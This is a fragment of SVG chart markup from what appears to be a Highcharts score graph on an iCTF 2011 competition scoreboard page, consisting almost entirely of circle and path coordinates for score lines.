r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="95.59375" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="94.06571691176471" cy="223.70690176" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="92.53768382352942" cy="224.13058432" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="91.00965073529413" cy="225.14897824" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="89.48161764705883" cy="226.60671904" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="87.95358455882354" cy="228.74346015999998" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="86.42555147058825" cy="229.45687936000002" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="84.89751838235294" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="83.36948529411765" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="81.84145220588236" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="80.31341911764706" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="78.78538602941177" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="77.25735294117648" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="75.72931985294119" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="74.20128676470588" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="72.6732536764706" cy="231.19469536" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="71.1452205882353" cy="231.74880736" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="69.6171875" cy="235.82508256" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="68.08915441176471" cy="236.315152" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="66.56112132352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="65.03308823529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="63.505055147058826" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="61.977022058823536" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="60.44898897058824" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="58.92095588235295" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="57.39292279411765" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="55.864889705882355" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="54.336856617647065" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="52.80882352941177" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="51.28079044117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="49.75275735294118" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="48.224724264705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="46.69669117647059" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="45.16865808823529" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="43.640625" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="42.1125919117647" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="40.58455882352941" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="39.056525735294116" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="37.528492647058826" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="36.00045955882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="34.47242647058823" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="32.94439338235294" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="31.416360294117645" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="29.88832720588235" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="28.360294117647058" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="26.832261029411764" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="25.30422794117647" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="23.776194852941178" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="22.248161764705884" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="20.72012867647059" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="19.192095588235297" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="17.6640625" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="16.136029411764707" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="14.607996323529413" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="13.07996323529412" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="11.551930147058824" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="10.02389705882353" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="8.495863970588236" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="6.967830882352942" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="5.439797794117648" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><circle cx="3.9117647058823533" cy="236.8" r="4" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.50725481600034 L 136.85064338235296 235.89758953600034 L 138.37867647058823 235.89758953600034 L 139.90670955882354 235.89758953600034 L 141.43474264705884 235.89758953600034 L 142.96277573529412 235.89758953600034 L 144.49080882352942 235.36319824000034 L 146.01884191176472 234.61045208533338 L 147.546875 233.96754797866723 L 149.0749080882353 232.6885438186672 L 150.6029411764706 231.93467444266722 L 152.13097426470588 231.04398913066746 L 153.6590073529412 229.45447228800128 L 155.18704044117646 227.6403948480013 L 156.71507352941177 225.1495548480013 L 158.24310661764707 223.5329970240013 L 159.77113970588235 221.9904865600013 L 161.29917279411765 220.9099681600013 L 162.82720588235296 220.2150485653341 L 164.35523897058823 218.3091874453341 L 165.88327205882354 216.68347256533409 L 167.41130514705884 213.77069048533406 L 168.93933823529412 212.36736632533407 L 170.46737132352942 209.9027045653341 L 171.99540441176472 209.23052408533408 L 173.5234375 207.43804280533408 L 175.0514705882353 206.15264504533408 L 176.5795036764706 204.6402389653341 L 178.10753676470588 202.88960024533407 L 179.6355698529412 201.74677976533405 L 181.1636029411765 200.21007800533408 L 182.69163602941177 199.2723500053341 L 184.21966911764707 198.50812299733408 L 185.74770220588235 198.50812299733408 L 187.27573529411765 198.1032435413342 L 188.80376838235296 197.5879193813342 L 190.33180147058823 196.38461386666745 L 191.85983455882354 195.82815281066746 L 193.38786764705884 195.82815281066746 L 194.91590073529412 195.82815281066746 L 196.44393382352942 195.82815281066746 L 197.97196691176472 195.82815281066746 L 199.5 195.82815281066746 L 201.0280330882353 195.82815281066746 L 202.5560661764706 195.82815281066746 L 204.08409926470588 195.34348951466745 L 205.6121323529412 194.74195357866745 L 207.1401654411765 194.13355320533395 L 208.66819852941177 194.0161398720007 L 210.19623161764707 193.83215416533406 L 211.72426470588235 193.4435061653341 L 213.25229779411765 193.1748009173341 L 214.78033088235296 191.56097497600047 L 216.30836397058823 188.2339231360005 L 217.83639705882354 184.73547308800025 L 219.36443014705884 184.41820844800026 L 220.89246323529412 184.41820844800026 L 222.42049632352942 184.41820844800026 L 223.94852941176472 184.41820844800026 L 225.4765625 184.41820844800026 L 227.0045955882353 184.41820844800026 L 228.5326286764706 184.41820844800026 L 230.06066176470588 184.41820844800026 L 231.5886948529412 184.41820844800026 L 233.1167279411765 184.41820844800026 L 234.64476102941177 184.41820844800026 L 236.17279411764707 183.20274956800023 L 237.70082720588238 180.34217399466627 L 239.22886029411765 179.20730999466628 L 240.75689338235296 178.37752727466628 L 242.28492647058823 178.37752727466628 L 243.81295955882354 178.26970118399976 L 245.34099264705884 178.26970118399976 L 246.86902573529412 178.26970118399976 L 248.39705882352942 178.26970118399976 L 249.92509191176472 178.26970118399976 L 251.453125 178.26970118399976 L 252.9811580882353 178.26970118399976 L 254.5091911764706 177.60764390399976 L 256.0372242647059 176.21131718399977 L 257.56525735294116 175.39002374399976 L 259.09329044117646 174.36015686399975 L 260.62132352941177 172.34496518399976 L 262.1493566176471 171.51937382399976 L 263.6773897058824 171.14074483199977 L 265.2054227941177 170.61452313599963 L 266.7334558823529 167.69499225599964 L 268.26148897058823 167.23873785599963 L 269.78952205882354 165.79854393599962 L 271.31755514705884 164.34552729599963 L 272.84558823529414 163.81610169599963 L 274.37362132352945 163.5164656319996 L 275.9016544117647 163.5164656319996 L 277.4296875 163.5164656319996 L 278.9577205882353 163.5164656319996 L 280.4857536764706 162.96027571199963 L 282.0137867647059 162.46325263999915 L 283.54181985294116 161.76315343999914 L 285.06985294117646 156.51088207999913 L 286.59788602941177 150.98766415999916 L 288.1259191176471 145.64261455999912 L 289.6539522058824 144.91086703999912 L 291.1819852941177 139.12849519999915 L 292.7100183823529 133.04782639999914 L 294.23805147058823 127.76958991999913 L 295.76608455882354 123.83113231999914 L 297.29411764705884 121.19799209599915 L 298.82215073529414 116.31456041599915 L 300.35018382352945 110.97760937599915 L 301.8782169117647 106.29866633599914 L 303.40625 101.35044617599914 L 304.9342830882353 98.07425897599916 L 306.4623161764706 94.82081167999914 L 307.9903492647059 92.1447269866654 L 309.51838235294116 89.74272803199796 L 311.04641544117646 89.74272803199796 L 312.57444852941177 89.74272803199796 L 314.1024816176471 89.37896771199794 L 315.6305147058824 88.01867603199796 L 317.1585477941177 88.01867603199796 L 318.6865808823529 88.01867603199796 L 320.21461397058823 88.01867603199796 L 321.74264705882354 88.01867603199796 L 323.27068014705884 88.01867603199796 L 324.79871323529414 85.62675923199558 L 326.32674632352945 79.24239443199559 L 327.8547794117647 73.29805139199559 L 329.3828125 68.96262227199557 L 330.9108455882353 61.243344831995586 L 332.4388786764706 61.243344831995586 L 333.9669117647059 61.243344831995586 L 335.4949448529412 61.243344831995586 L 337.02297794117646 61.243344831995586 L 338.55101102941177 61.243344831995586 L 340.0790441176471 61.243344831995586 L 341.6070772058824 61.243344831995586 L 343.1351102941177 61.243344831995586 L 344.6631433823529 61.243344831995586 L 346.19117647058823 61.243344831995586 L 347.71920955882354 61.243344831995586 L 349.24724264705884 61.243344831995586 L 350.77527573529414 56.36598707199559 L 352.30330882352945 51.59593523199558 L 353.8313419117647 51.59593523199558 L 355.359375 47.1822200319956 L 356.8874080882353 47.1822200319956 L 358.4154411764706 47.1822200319956 L 359.9434742647059 47.1822200319956 L 361.4715073529412 47.1822200319956 L 362.99954044117646 47.1822200319956 L 364.52757352941177 47.1822200319956 L 366.0556066176471 47.1822200319956 L 367.5836397058824 47.1822200319956 L 369.1116727941177 47.1822200319956 L 370.6397058823529 47.1822200319956 L 372.16773897058823 47.1822200319956 L 373.69577205882354 47.1822200319956 L 375.22380514705884 47.1822200319956 L 376.75183823529414 47.1822200319956 L 378.27987132352945 46.90146995199555 L 379.8079044117647 46.90146995199555 L 381.3359375 41.28916787199557 L 382.8639705882353 39.96640307199556 L 384.3920036764706 39.96640307199556 L 385.9200367647059 39.96640307199556 L 387.4480698529412 39.96640307199556 L 388.97610294117646 39.96640307199556 L 390.50413602941177 39.96640307199556 L 392.0321691176471 37.22124776532809 L 393.5602022058824 35.36195336532808 L 395.0882352941177 35.05488296532809" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.50725481600034 L 136.85064338235296 235.89758953600034 L 138.37867647058823 235.89758953600034 L 139.90670955882354 235.89758953600034 L 141.43474264705884 235.89758953600034 L 142.96277573529412 235.89758953600034 L 144.49080882352942 235.36319824000034 L 146.01884191176472 234.61045208533338 L 147.546875 233.96754797866723 L 149.0749080882353 232.6885438186672 L 150.6029411764706 231.93467444266722 L 152.13097426470588 231.04398913066746 L 153.6590073529412 229.45447228800128 L 155.18704044117646 227.6403948480013 L 156.71507352941177 225.1495548480013 L 158.24310661764707 223.5329970240013 L 159.77113970588235 221.9904865600013 L 161.29917279411765 220.9099681600013 L 162.82720588235296 220.2150485653341 L 164.35523897058823 218.3091874453341 L 165.88327205882354 216.68347256533409 L 167.41130514705884 213.77069048533406 L 168.93933823529412 212.36736632533407 L 170.46737132352942 209.9027045653341 L 171.99540441176472 209.23052408533408 L 173.5234375 207.43804280533408 L 175.0514705882353 206.15264504533408 L 176.5795036764706 204.6402389653341 L 178.10753676470588 202.88960024533407 L 179.6355698529412 201.74677976533405 L 181.1636029411765 200.21007800533408 L 182.69163602941177 199.2723500053341 L 184.21966911764707 198.50812299733408 L 185.74770220588235 198.50812299733408 L 187.27573529411765 198.1032435413342 L 188.80376838235296 197.5879193813342 L 190.33180147058823 196.38461386666745 L 191.85983455882354 195.82815281066746 L 193.38786764705884 195.82815281066746 L 194.91590073529412 195.82815281066746 L 196.44393382352942 195.82815281066746 L 197.97196691176472 195.82815281066746 L 199.5 195.82815281066746 L 201.0280330882353 195.82815281066746 L 202.5560661764706 195.82815281066746 L 204.08409926470588 195.34348951466745 L 205.6121323529412 194.74195357866745 L 207.1401654411765 194.13355320533395 L 208.66819852941177 194.0161398720007 L 210.19623161764707 193.83215416533406 L 211.72426470588235 193.4435061653341 L 213.25229779411765 193.1748009173341 L 214.78033088235296 191.56097497600047 L 216.30836397058823 188.2339231360005 L 217.83639705882354 184.73547308800025 L 219.36443014705884 184.41820844800026 L 220.89246323529412 184.41820844800026 L 222.42049632352942 184.41820844800026 L 223.94852941176472 184.41820844800026 L 225.4765625 184.41820844800026 L 227.0045955882353 184.41820844800026 L 228.5326286764706 184.41820844800026 L 230.06066176470588 184.41820844800026 L 231.5886948529412 184.41820844800026 L 233.1167279411765 184.41820844800026 L 234.64476102941177 184.41820844800026 L 236.17279411764707 183.20274956800023 L 237.70082720588238 180.34217399466627 L 239.22886029411765 179.20730999466628 L 240.75689338235296 178.37752727466628 L 242.28492647058823 178.37752727466628 L 243.81295955882354 178.26970118399976 L 245.34099264705884 178.26970118399976 L 246.86902573529412 178.26970118399976 L 248.39705882352942 178.26970118399976 L 249.92509191176472 178.26970118399976 L 251.453125 178.26970118399976 L 252.9811580882353 178.26970118399976 L 254.5091911764706 177.60764390399976 L 256.0372242647059 176.21131718399977 L 257.56525735294116 175.39002374399976 L 259.09329044117646 174.36015686399975 L 260.62132352941177 172.34496518399976 L 262.1493566176471 171.51937382399976 L 263.6773897058824 171.14074483199977 L 265.2054227941177 170.61452313599963 L 266.7334558823529 167.69499225599964 L 268.26148897058823 167.23873785599963 L 269.78952205882354 165.79854393599962 L 271.31755514705884 164.34552729599963 L 272.84558823529414 163.81610169599963 L 274.37362132352945 163.5164656319996 L 275.9016544117647 163.5164656319996 L 277.4296875 163.5164656319996 L 278.9577205882353 163.5164656319996 L 280.4857536764706 162.96027571199963 L 282.0137867647059 162.46325263999915 L 283.54181985294116 161.76315343999914 L 285.06985294117646 156.51088207999913 L 286.59788602941177 150.98766415999916 L 288.1259191176471 145.64261455999912 L 289.6539522058824 144.91086703999912 L 291.1819852941177 139.12849519999915 L 292.7100183823529 133.04782639999914 L 294.23805147058823 127.76958991999913 L 295.76608455882354 123.83113231999914 L 297.29411764705884 121.19799209599915 L 298.82215073529414 116.31456041599915 L 300.35018382352945 110.97760937599915 L 301.8782169117647 106.29866633599914 L 303.40625 101.35044617599914 L 304.9342830882353 98.07425897599916 L 306.4623161764706 94.82081167999914 L 307.9903492647059 92.1447269866654 L 309.51838235294116 89.74272803199796 L 311.04641544117646 89.74272803199796 L 312.57444852941177 89.74272803199796 L 314.1024816176471 89.37896771199794 L 315.6305147058824 88.01867603199796 L 317.1585477941177 88.01867603199796 L 318.6865808823529 88.01867603199796 L 320.21461397058823 88.01867603199796 L 321.74264705882354 88.01867603199796 L 323.27068014705884 88.01867603199796 L 324.79871323529414 85.62675923199558 L 326.32674632352945 79.24239443199559 L 327.8547794117647 73.29805139199559 L 329.3828125 68.96262227199557 L 330.9108455882353 61.243344831995586 L 332.4388786764706 61.243344831995586 L 333.9669117647059 61.243344831995586 L 335.4949448529412 61.243344831995586 L 337.02297794117646 61.243344831995586 L 338.55101102941177 61.243344831995586 L 340.0790441176471 61.243344831995586 L 341.6070772058824 61.243344831995586 L 343.1351102941177 61.243344831995586 L 344.6631433823529 61.243344831995586 L 346.19117647058823 61.243344831995586 L 347.71920955882354 61.243344831995586 L 349.24724264705884 61.243344831995586 L 350.77527573529414 56.36598707199559 L 352.30330882352945 51.59593523199558 L 353.8313419117647 51.59593523199558 L 355.359375 47.1822200319956 L 356.8874080882353 47.1822200319956 L 358.4154411764706 47.1822200319956 L 359.9434742647059 47.1822200319956 L 361.4715073529412 47.1822200319956 L 362.99954044117646 47.1822200319956 L 364.52757352941177 47.1822200319956 L 366.0556066176471 47.1822200319956 L 367.5836397058824 47.1822200319956 L 369.1116727941177 47.1822200319956 L 370.6397058823529 47.1822200319956 L 372.16773897058823 47.1822200319956 L 373.69577205882354 47.1822200319956 L 375.22380514705884 47.1822200319956 L 376.75183823529414 47.1822200319956 L 378.27987132352945 46.90146995199555 L 379.8079044117647 46.90146995199555 L 381.3359375 41.28916787199557 L 382.8639705882353 39.96640307199556 L 384.3920036764706 39.96640307199556 L 385.9200367647059 39.96640307199556 L 387.4480698529412 39.96640307199556 L 388.97610294117646 39.96640307199556 L 390.50413602941177 39.96640307199556 L 392.0321691176471 37.22124776532809 L 393.5602022058824 35.36195336532808 L 395.0882352941177 35.05488296532809" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.50725481600034 L 136.85064338235296 235.89758953600034 L 138.37867647058823 235.89758953600034 L 139.90670955882354 235.89758953600034 L 141.43474264705884 235.89758953600034 L 142.96277573529412 235.89758953600034 L 144.49080882352942 235.36319824000034 L 146.01884191176472 234.61045208533338 L 147.546875 233.96754797866723 L 149.0749080882353 232.6885438186672 L 150.6029411764706 231.93467444266722 L 152.13097426470588 231.04398913066746 L 153.6590073529412 229.45447228800128 L 155.18704044117646 227.6403948480013 L 156.71507352941177 225.1495548480013 L 158.24310661764707 223.5329970240013 L 159.77113970588235 221.9904865600013 L 161.29917279411765 220.9099681600013 L 162.82720588235296 220.2150485653341 L 164.35523897058823 218.3091874453341 L 165.88327205882354 216.68347256533409 L 167.41130514705884 213.77069048533406 L 168.93933823529412 212.36736632533407 L 170.46737132352942 209.9027045653341 L 171.99540441176472 209.23052408533408 L 173.5234375 207.43804280533408 L 175.0514705882353 206.15264504533408 L 176.5795036764706 204.6402389653341 L 178.10753676470588 202.88960024533407 L 179.6355698529412 201.74677976533405 L 181.1636029411765 200.21007800533408 L 182.69163602941177 199.2723500053341 L 184.21966911764707 198.50812299733408 L 185.74770220588235 198.50812299733408 L 187.27573529411765 198.1032435413342 L 188.80376838235296 197.5879193813342 L 190.33180147058823 196.38461386666745 L 191.85983455882354 195.82815281066746 L 193.38786764705884 195.82815281066746 L 194.91590073529412 195.82815281066746 L 196.44393382352942 195.82815281066746 L 197.97196691176472 195.82815281066746 L 199.5 195.82815281066746 L 201.0280330882353 195.82815281066746 L 202.5560661764706 195.82815281066746 L 204.08409926470588 195.34348951466745 L 205.6121323529412 194.74195357866745 L 207.1401654411765 194.13355320533395 L 208.66819852941177 194.0161398720007 L 210.19623161764707 193.83215416533406 L 211.72426470588235 193.4435061653341 L 213.25229779411765 193.1748009173341 L 214.78033088235296 191.56097497600047 L 216.30836397058823 188.2339231360005 L 217.83639705882354 184.73547308800025 L 219.36443014705884 184.41820844800026 L 220.89246323529412 184.41820844800026 L 222.42049632352942 184.41820844800026 L 223.94852941176472 184.41820844800026 L 225.4765625 184.41820844800026 L 227.0045955882353 184.41820844800026 L 228.5326286764706 184.41820844800026 L 230.06066176470588 184.41820844800026 L 231.5886948529412 184.41820844800026 L 233.1167279411765 184.41820844800026 L 234.64476102941177 184.41820844800026 L 236.17279411764707 183.20274956800023 L 237.70082720588238 180.34217399466627 L 239.22886029411765 179.20730999466628 L 240.75689338235296 178.37752727466628 L 242.28492647058823 178.37752727466628 L 243.81295955882354 178.26970118399976 L 245.34099264705884 178.26970118399976 L 246.86902573529412 178.26970118399976 L 248.39705882352942 178.26970118399976 L 249.92509191176472 178.26970118399976 L 251.453125 178.26970118399976 L 252.9811580882353 178.26970118399976 L 254.5091911764706 177.60764390399976 L 256.0372242647059 176.21131718399977 L 257.56525735294116 175.39002374399976 L 259.09329044117646 174.36015686399975 L 260.62132352941177 172.34496518399976 L 262.1493566176471 171.51937382399976 L 263.6773897058824 171.14074483199977 L 265.2054227941177 170.61452313599963 L 266.7334558823529 167.69499225599964 L 268.26148897058823 